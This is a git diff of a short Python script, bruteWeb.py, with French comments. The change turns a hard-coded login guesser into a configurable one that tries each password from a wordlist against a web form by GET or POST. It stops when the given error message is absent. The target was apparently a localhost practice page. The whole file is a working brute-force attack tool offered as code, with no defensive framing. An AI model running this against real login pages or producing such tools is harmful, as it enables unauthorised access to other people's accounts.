scapy

1 files changed, 27 insertions, 17 deletions

diff --git a/bruteWeb.py b/bruteWeb.py
index 541e673..e75cde1 100644
--- a/bruteWeb.py
+++ b/bruteWeb.py
@@ -1,27 +1,37 @@
 import sys
 import requests 
 
-def bruteforce(url,username,password):
-    reponse=requests.post(url=url,data={
-    "username":username,
-    "password":password
-    })
-    #print(reponse.text)
-    if "Mauvais mot de passe" in reponse.text:
-        #print("mauvais pwd")
-        return False
+def bruteforce(method,url,username,password,error_msg):
+    if method == "post":
+        reponse=requests.post(url,data={
+        "username":username,
+        "password":password
+        })
+    elif method == "get":
+        reponse=requests.get(url,params={
+        "username":username,
+        "password":password
+        })
+
+    if error_msg in reponse.text:
+        #print("erreur : ",password)
+        pass
     else:
-        print(f"Trouvé password \"{password}\"")
+        print("trouvé : ",password)
         return True
 
 if __name__ == "__main__":
-    url = sys.argv[1]
-    dico = sys.argv[2]
+    method = sys.argv[1]
+    url = sys.argv[2]
+    username = sys.argv[3]
+    dico = sys.argv[4]
+    error_msg= sys.argv[5]
     with open(dico, 'r') as wordlist:
-        for password in wordlist.readlines():
-            password=password.strip()
-            if bruteforce(url,"jerome",password)==True:
-                sys.exit()
+        for ligne in wordlist.readlines():
+            # le fichier nmap.lst à des commentaires en début de fichier
+            if ligne[0] != "#":
+                password=ligne.strip()
+                if bruteforce(method,url,username,password,error_msg)==True:
+                    sys.exit()
 
-#bruteforce("http://localhost/page.php","jerome","secret")